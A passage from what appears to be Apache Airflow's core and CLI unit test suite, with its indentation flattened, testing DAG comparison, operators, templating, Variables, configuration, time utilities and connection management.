# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
os.kill(pid, signal.SIGTERM)
self.fail("BashOperator's subprocess still running after stopping on timeout!")
def test_trigger_dagrun(self):
def trigga(context, obj):
if True:
return obj
t = TriggerDagRunOperator(
task_id='test_trigger_dagrun',
trigger_dag_id='example_bash_operator',
python_callable=trigga,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_dryrun(self):
t = BashOperator(
task_id='test_dryrun',
bash_command="echo success",
dag=self.dag)
t.dry_run()
def test_sqlite(self):
import airflow.operators.sqlite_operator
t = airflow.operators.sqlite_operator.SqliteOperator(
task_id='time_sqlite',
sql="CREATE TABLE IF NOT EXISTS unitest (dummy VARCHAR(20))",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_timeout(self):
t = PythonOperator(
task_id='test_timeout',
execution_timeout=timedelta(seconds=1),
python_callable=lambda: sleep(5),
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_python_op(self):
def test_py_op(templates_dict, ds, **kwargs):
if not templates_dict['ds'] == ds:
raise Exception("failure")
t = PythonOperator(
task_id='test_py_op',
provide_context=True,
python_callable=test_py_op,
templates_dict={'ds': "{{ ds }}"},
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_complex_template(self):
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field['bar'][1],
context['ds'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field={
'foo': '123',
'bar': ['baz', '{{ ds }}']
},
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_variable(self):
"""
Test the availability of variables in templates
"""
val = {
'test_value': 'a test value'
}
Variable.set("a_variable", val['test_value'])
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable(self):
"""
Test the availability of variables (serialized as JSON) in templates
"""
val = {
'test_value': {'foo': 'bar', 'obj': {'v1': 'yes', 'v2': 'no'}}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
val['test_value']['obj']['v2'])
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.json.a_variable.obj.v2 }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_with_json_variable_as_value(self):
"""
Test the availability of variables (serialized as JSON) in templates, but
accessed as a value
"""
val = {
'test_value': {'foo': 'bar'}
}
Variable.set("a_variable", val['test_value'], serialize_json=True)
def verify_templated_field(context):
self.assertEqual(context['ti'].task.some_templated_field,
u'{"foo": "bar"}')
t = OperatorSubclass(
task_id='test_complex_template',
some_templated_field='{{ var.value.a_variable }}',
dag=self.dag)
t.execute = verify_templated_field
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_template_non_bool(self):
"""
Test templates can handle objects with no sense of truthiness
"""
class NonBoolObject(object):
def __len__(self):
return NotImplemented
def __bool__(self):
return NotImplemented
t = OperatorSubclass(
task_id='test_bad_template_obj',
some_templated_field=NonBoolObject(),
dag=self.dag)
t.resolve_template_files()
def test_import_examples(self):
self.assertEqual(len(self.dagbag.dags), NUM_EXAMPLE_DAGS)
def test_local_task_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(task_instance=ti, ignore_ti_state=True)
job.run()
def test_raw_job(self):
TI = models.TaskInstance
ti = TI(
task=self.runme_0, execution_date=DEFAULT_DATE)
ti.dag = self.dag_bash
ti.run(ignore_ti_state=True)
def test_doctests(self):
modules = [utils, macros]
for mod in modules:
failed, tests = doctest.testmod(mod)
if failed:
raise Exception("Failed a doctest")
def test_variable_set_get_round_trip(self):
Variable.set("tested_var_set_id", "Monday morning breakfast")
self.assertEqual("Monday morning breakfast", Variable.get("tested_var_set_id"))
def test_variable_set_get_round_trip_json(self):
value = {"a": 17, "b": 47}
Variable.set("tested_var_set_id", value, serialize_json=True)
self.assertEqual(value, Variable.get("tested_var_set_id", deserialize_json=True))
def test_get_non_existing_var_should_return_default(self):
default_value = "some default val"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value))
def test_get_non_existing_var_should_not_deserialize_json_default(self):
default_value = "}{ this is a non JSON default }{"
self.assertEqual(default_value, Variable.get("thisIdDoesNotExist",
default_var=default_value,
deserialize_json=True))
def test_variable_setdefault_round_trip(self):
key = "tested_var_setdefault_1_id"
value = "Monday morning breakfast in Paris"
Variable.setdefault(key, value)
self.assertEqual(value, Variable.get(key))
def test_variable_setdefault_round_trip_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.setdefault(key, value, deserialize_json=True)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_variable_setdefault_existing_json(self):
key = "tested_var_setdefault_2_id"
value = {"city": 'Paris', "Hapiness": True}
Variable.set(key, value, serialize_json=True)
val = Variable.setdefault(key, value, deserialize_json=True)
# Check the returned value, and the stored value are handled correctly.
self.assertEqual(value, val)
self.assertEqual(value, Variable.get(key, deserialize_json=True))
def test_parameterized_config_gen(self):
cfg = configuration.parameterized_config(configuration.DEFAULT_CONFIG)
# making sure some basic building blocks are present:
self.assertIn("[core]", cfg)
self.assertIn("dags_folder", cfg)
self.assertIn("sql_alchemy_conn", cfg)
self.assertIn("fernet_key", cfg)
# making sure replacement actually happened
self.assertNotIn("{AIRFLOW_HOME}", cfg)
self.assertNotIn("{FERNET_KEY}", cfg)
def test_config_use_original_when_original_and_fallback_are_present(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
configuration.conf.set("core", "FERNET_KEY_CMD", "printf HELLO")
FALLBACK_FERNET_KEY = configuration.conf.get(
"core",
"FERNET_KEY"
)
self.assertEqual(FERNET_KEY, FALLBACK_FERNET_KEY)
# restore the conf back to the original state
configuration.conf.remove_option("core", "FERNET_KEY_CMD")
def test_config_throw_error_when_original_and_fallback_is_absent(self):
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
self.assertFalse(configuration.conf.has_option("core", "FERNET_KEY_CMD"))
FERNET_KEY = configuration.conf.get("core", "FERNET_KEY")
configuration.conf.remove_option("core", "FERNET_KEY")
with self.assertRaises(AirflowConfigException) as cm:
configuration.conf.get("core", "FERNET_KEY")
exception = str(cm.exception)
message = "section/key [core/fernet_key] not found in config"
self.assertEqual(message, exception)
# restore the conf back to the original state
configuration.conf.set("core", "FERNET_KEY", FERNET_KEY)
self.assertTrue(configuration.conf.has_option("core", "FERNET_KEY"))
def test_config_override_original_when_non_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = "some value"
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_config_override_original_when_empty_envvar_is_provided(self):
key = "AIRFLOW__CORE__FERNET_KEY"
value = ""
self.assertNotIn(key, os.environ)
os.environ[key] = value
FERNET_KEY = configuration.conf.get('core', 'FERNET_KEY')
self.assertEqual(value, FERNET_KEY)
# restore the envvar back to the original state
del os.environ[key]
def test_round_time(self):
rt1 = round_time(datetime(2015, 1, 1, 6), timedelta(days=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt1)
rt2 = round_time(datetime(2015, 1, 2), relativedelta(months=1))
self.assertEqual(datetime(2015, 1, 1, 0, 0), rt2)
rt3 = round_time(datetime(2015, 9, 16, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 16, 0, 0), rt3)
rt4 = round_time(datetime(2015, 9, 15, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 15, 0, 0), rt4)
rt5 = round_time(datetime(2015, 9, 14, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt5)
rt6 = round_time(datetime(2015, 9, 13, 0, 0), timedelta(1), datetime(
2015, 9, 14, 0, 0))
self.assertEqual(datetime(2015, 9, 14, 0, 0), rt6)
def test_infer_time_unit(self):
self.assertEqual('minutes', infer_time_unit([130, 5400, 10]))
self.assertEqual('seconds', infer_time_unit([110, 50, 10, 100]))
self.assertEqual('hours', infer_time_unit([100000, 50000, 10000, 20000]))
self.assertEqual('days', infer_time_unit([200000, 100000]))
def test_scale_time_units(self):
# use assert_almost_equal from numpy.testing since we are comparing
# floating point arrays
arr1 = scale_time_units([130, 5400, 10], 'minutes')
assert_array_almost_equal(arr1, [2.167, 90.0, 0.167], decimal=3)
arr2 = scale_time_units([110, 50, 10, 100], 'seconds')
assert_array_almost_equal(arr2, [110.0, 50.0, 10.0, 100.0], decimal=3)
arr3 = scale_time_units([100000, 50000, 10000, 20000], 'hours')
assert_array_almost_equal(arr3, [27.778, 13.889, 2.778, 5.556],
decimal=3)
arr4 = scale_time_units([200000, 100000], 'days')
assert_array_almost_equal(arr4, [2.315, 1.157], decimal=3)
def test_duplicate_dependencies(self):
regexp = "Dependency (.*)runme_0(.*)run_after_loop(.*) " \
"already registered"
with self.assertRaisesRegexp(AirflowException, regexp):
self.runme_0.set_downstream(self.run_after_loop)
with self.assertRaisesRegexp(AirflowException, regexp):
self.run_after_loop.set_upstream(self.runme_0)
def test_bad_trigger_rule(self):
with self.assertRaises(AirflowException):
DummyOperator(
task_id='test_bad_trigger',
trigger_rule="non_existant",
dag=self.dag)
def test_terminate_task(self):
"""If a task instance's db state get deleted, it should fail"""
TI = models.TaskInstance
dag = self.dagbag.dags.get('test_utils')
task = dag.task_dict.get('sleeps_forever')
ti = TI(task=task, execution_date=DEFAULT_DATE)
job = jobs.LocalTaskJob(
task_instance=ti, ignore_ti_state=True, executor=SequentialExecutor())
# Running task instance asynchronously
p = multiprocessing.Process(target=job.run)
p.start()
sleep(5)
settings.engine.dispose()
session = settings.Session()
ti.refresh_from_db(session=session)
# making sure it's actually running
self.assertEqual(State.RUNNING, ti.state)
ti = session.query(TI).filter_by(
dag_id=task.dag_id,
task_id=task.task_id,
execution_date=DEFAULT_DATE
).one()
# deleting the instance should result in a failure
session.delete(ti)
session.commit()
# waiting for the async task to finish
p.join()
# making sure that the task ended up as failed
ti.refresh_from_db(session=session)
self.assertEqual(State.FAILED, ti.state)
session.close()
def test_task_fail_duration(self):
"""If a task fails, the duration should be recorded in TaskFail"""
p = BashOperator(
task_id='pass_sleepy',
bash_command='sleep 3',
dag=self.dag)
f = BashOperator(
task_id='fail_sleepy',
bash_command='sleep 5',
execution_timeout=timedelta(seconds=3),
retry_delay=timedelta(seconds=0),
dag=self.dag)
session = settings.Session()
try:
p.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
try:
f.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
except:
pass
p_fails = session.query(models.TaskFail).filter_by(
task_id='pass_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
f_fails = session.query(models.TaskFail).filter_by(
task_id='fail_sleepy',
dag_id=self.dag.dag_id,
execution_date=DEFAULT_DATE).all()
print(f_fails)
self.assertEqual(0, len(p_fails))
self.assertEqual(1, len(f_fails))
        # The failing task is killed by its 3-second execution timeout, so its
        # recorded duration should be at least 3 seconds.
self.assertGreaterEqual(sum([f.duration for f in f_fails]), 3)
def test_dag_stats(self):
"""Correctly sets/dirties/cleans rows of DagStat table"""
session = settings.Session()
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
models.DagStat.update([], session=session)
run1 = self.dag_bash.create_dagrun(
run_id="run1",
execution_date=DEFAULT_DATE,
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 1)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
run2 = self.dag_bash.create_dagrun(
run_id="run2",
execution_date=DEFAULT_DATE + timedelta(days=1),
state=State.RUNNING)
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).all()
self.assertEqual(3, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
for stats in qry:
if stats.state == State.RUNNING:
self.assertEqual(stats.count, 2)
else:
self.assertEqual(stats.count, 0)
self.assertFalse(stats.dirty)
session.query(models.DagRun).first().state = State.SUCCESS
session.commit()
models.DagStat.update([self.dag_bash.dag_id], session=session)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.SUCCESS).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.SUCCESS, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
qry = session.query(models.DagStat).filter(models.DagStat.state == State.RUNNING).all()
self.assertEqual(1, len(qry))
self.assertEqual(self.dag_bash.dag_id, qry[0].dag_id)
self.assertEqual(State.RUNNING, qry[0].state)
self.assertEqual(1, qry[0].count)
self.assertFalse(qry[0].dirty)
session.query(models.DagRun).delete()
session.query(models.DagStat).delete()
session.commit()
session.close()
def test_run_command(self):
if six.PY3:
write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))'
else:
write = r'sys.stdout.write(u"\u1000foo".encode("utf8"))'
cmd = 'import sys; {0}; sys.stdout.flush()'.format(write)
self.assertEqual(run_command("python -c '{0}'".format(cmd)),
u'\u1000foo' if six.PY3 else 'foo')
self.assertEqual(run_command('echo "foo bar"'), u'foo bar\n')
self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"')
class CliTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(CliTests, cls).setUpClass()
cls._cleanup()
def setUp(self):
super(CliTests, self).setUp()
configuration.load_test_config()
app = application.create_app()
app.config['TESTING'] = True
self.parser = cli.CLIFactory.get_parser()
self.dagbag = models.DagBag(dag_folder=DEV_NULL, include_examples=True)
self.session = Session()
def tearDown(self):
self._cleanup(session=self.session)
super(CliTests, self).tearDown()
@staticmethod
def _cleanup(session=None):
if session is None:
session = Session()
session.query(models.Pool).delete()
session.query(models.Variable).delete()
session.commit()
session.close()
def test_cli_list_dags(self):
args = self.parser.parse_args(['list_dags', '--report'])
cli.list_dags(args)
def test_cli_list_tasks(self):
for dag_id in self.dagbag.dags.keys():
args = self.parser.parse_args(['list_tasks', dag_id])
cli.list_tasks(args)
args = self.parser.parse_args([
'list_tasks', 'example_bash_operator', '--tree'])
cli.list_tasks(args)
@mock.patch("airflow.bin.cli.db_utils.initdb")
def test_cli_initdb(self, initdb_mock):
cli.initdb(self.parser.parse_args(['initdb']))
initdb_mock.assert_called_once_with(False)
@mock.patch("airflow.bin.cli.db_utils.resetdb")
def test_cli_resetdb(self, resetdb_mock):
cli.resetdb(self.parser.parse_args(['resetdb', '--yes']))
resetdb_mock.assert_called_once_with(False)
def test_cli_connections_list(self):
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(['connections', '--list']))
stdout = mock_stdout.getvalue()
conns = [[x.strip("'") for x in re.findall("'\w+'", line)[:2]]
for ii, line in enumerate(stdout.split('\n'))
if ii % 2 == 1]
conns = [conn for conn in conns if len(conn) > 0]
# Assert that some of the connections are present in the output as
# expected:
self.assertIn(['aws_default', 'aws'], conns)
self.assertIn(['beeline_default', 'beeline'], conns)
self.assertIn(['emr_default', 'emr'], conns)
self.assertIn(['mssql_default', 'mssql'], conns)
self.assertIn(['mysql_default', 'mysql'], conns)
self.assertIn(['postgres_default', 'postgres'], conns)
self.assertIn(['wasb_default', 'wasb'], conns)
# Attempt to list connections with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--list', '--conn_id=fake', '--conn_uri=fake-uri',
'--conn_type=fake-type', '--conn_host=fake_host',
'--conn_login=fake_login', '--conn_password=fake_password',
'--conn_schema=fake_schema', '--conn_port=fake_port', '--conn_extra=fake_extra']))
stdout = mock_stdout.getvalue()
# Check list attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--list flag: ['conn_id', 'conn_uri', 'conn_extra', " +
"'conn_type', 'conn_host', 'conn_login', " +
"'conn_password', 'conn_schema', 'conn_port']"),
])
def test_cli_connections_list_redirect(self):
cmd = ['airflow', 'connections', '--list']
with tempfile.TemporaryFile() as fp:
p = subprocess.Popen(cmd, stdout=fp)
p.wait()
self.assertEqual(0, p.returncode)
def test_cli_connections_add_delete(self):
# Add connections:
uri = 'postgresql://airflow:airflow@host:5432/airflow'
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new2',
'--conn_uri=%s' % uri]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new3',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new4',
'--conn_uri=%s' % uri, '--conn_extra', "{'extra': 'yes'}"]))
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new5',
'--conn_type=hive_metastore', '--conn_login=airflow',
'--conn_password=airflow', '--conn_host=host',
'--conn_port=9083', '--conn_schema=airflow']))
cli.connections(self.parser.parse_args(
['connections', '-a', '--conn_id=new6',
'--conn_uri', "", '--conn_type=google_cloud_platform', '--conn_extra', "{'extra': 'yes'}"]))
stdout = mock_stdout.getvalue()
# Check addition stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tSuccessfully added `conn_id`=new1 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new2 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new3 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new4 : " +
"postgresql://airflow:airflow@host:5432/airflow"),
("\tSuccessfully added `conn_id`=new5 : " +
"hive_metastore://airflow:airflow@host:9083/airflow"),
("\tSuccessfully added `conn_id`=new6 : " +
"google_cloud_platform://:@:")
])
# Attempt to add duplicate
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new1',
'--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tA connection with `conn_id`=new1 already exists",
])
# Attempt to add without providing conn_id
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_uri=%s' % uri]))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_id']"),
])
# Attempt to add without providing conn_uri
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--add', '--conn_id=new']))
stdout = mock_stdout.getvalue()
# Check stdout for addition attempt
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are required to add a connection:" +
" ['conn_uri or conn_type']"),
])
# Prepare to add connections
session = settings.Session()
extra = {'new1': None,
'new2': None,
'new3': "{'extra': 'yes'}",
'new4': "{'extra': 'yes'}"}
# Add connections
for index in range(1, 6):
conn_id = 'new%s' % index
result = (session
.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
result = (result.conn_id, result.conn_type, result.host,
result.port, result.get_extra())
if conn_id in ['new1', 'new2', 'new3', 'new4']:
self.assertEqual(result, (conn_id, 'postgres', 'host', 5432,
extra[conn_id]))
elif conn_id == 'new5':
self.assertEqual(result, (conn_id, 'hive_metastore', 'host',
9083, None))
elif conn_id == 'new6':
self.assertEqual(result, (conn_id, 'google_cloud_platform',
None, None, "{'extra': 'yes'}"))
# Delete connections
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new1']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new2']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new3']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new4']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new5']))
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=new6']))
stdout = mock_stdout.getvalue()
# Check deletion stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tSuccessfully deleted `conn_id`=new1",
"\tSuccessfully deleted `conn_id`=new2",
"\tSuccessfully deleted `conn_id`=new3",
"\tSuccessfully deleted `conn_id`=new4",
"\tSuccessfully deleted `conn_id`=new5",
"\tSuccessfully deleted `conn_id`=new6"
])
# Check deletions
for index in range(1, 7):
conn_id = 'new%s' % index
result = (session.query(models.Connection)
.filter(models.Connection.conn_id == conn_id)
.first())
self.assertTrue(result is None)
        # Attempt to delete a non-existing connection
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
"\tDid not find a connection with `conn_id`=fake",
])
# Attempt to delete with invalid cli args
with mock.patch('sys.stdout',
new_callable=six.StringIO) as mock_stdout:
cli.connections(self.parser.parse_args(
['connections', '--delete', '--conn_id=fake',
'--conn_uri=%s' % uri, '--conn_type=fake-type']))
stdout = mock_stdout.getvalue()
# Check deletion attempt stdout
lines = [l for l in stdout.split('\n') if len(l) > 0]
self.assertListEqual(lines, [
("\tThe following args are not compatible with the " +
"--delete flag: ['conn_uri', 'conn_type']"),
])
session.close()
def test_cli_test(self):
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_bash_operator', 'runme_0', '--dry_run',
DEFAULT_DATE.isoformat()]))
def test_cli_test_with_params(self):
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
cli.test(self.parser.parse_args([
'test', 'example_passing_params_via_test_command', 'also_run_this',
'-tp', '{"foo":"bar"}', DEFAULT_DATE.isoformat()]))
def test_cli_run(self):
cli.run(self.parser.parse_args([
'run', 'example_bash_operator', 'runme_0', '-l',
DEFAULT_DATE.isoformat()]))
def test_task_state(self):
cli.task_state(self.parser.parse_args([
'task_state', 'example_bash_operator', 'runme_0',
DEFAULT_DATE.isoformat()]))
def test_dag_state(self):
self.assertEqual(None, cli.dag_state(self.parser.parse_args([
'dag_state', 'example_bash_operator', DEFAULT_DATE.isoformat()])))
def test_pause(self):
args = self.parser.parse_args([
'pause', 'example_bash_operator'])
cli.pause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [True, 1])
args = self.parser.parse_args([
'unpause', 'example_bash_operator'])
cli.unpause(args)
self.assertIn(self.dagbag.dags['example_bash_operator'].is_paused, [False, 0])
def test_subdag_clear(self):
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm'])
cli.clear(args)
args = self.parser.parse_args([
'clear', 'example_subdag_operator', '--no_confirm', '--exclude_subdags'])
cli.clear(args)
def test_get_dags(self):
dags = cli.get_dags(self.parser.parse_args(['clear', 'example_subdag_operator', '-c']))
self.assertEqual(len(dags), 1)
dags = cli.get_dags(self.parser.parse_args(['clear', 'subdag', '-dx', '-c']))
self.assertGreater(len(dags), 1)
with self.assertRaises(AirflowException):
cli.get_dags(self.parser.parse_args(['clear', 'foobar', '-dx', '-c']))
def test_backfill(self):
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-t', 'runme_0', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '--dry_run',
'-s', DEFAULT_DATE.isoformat()]))
cli.backfill(self.parser.parse_args([
'backfill', 'example_bash_operator', '-l',
'-s', DEFAULT_DATE.isoformat()]))
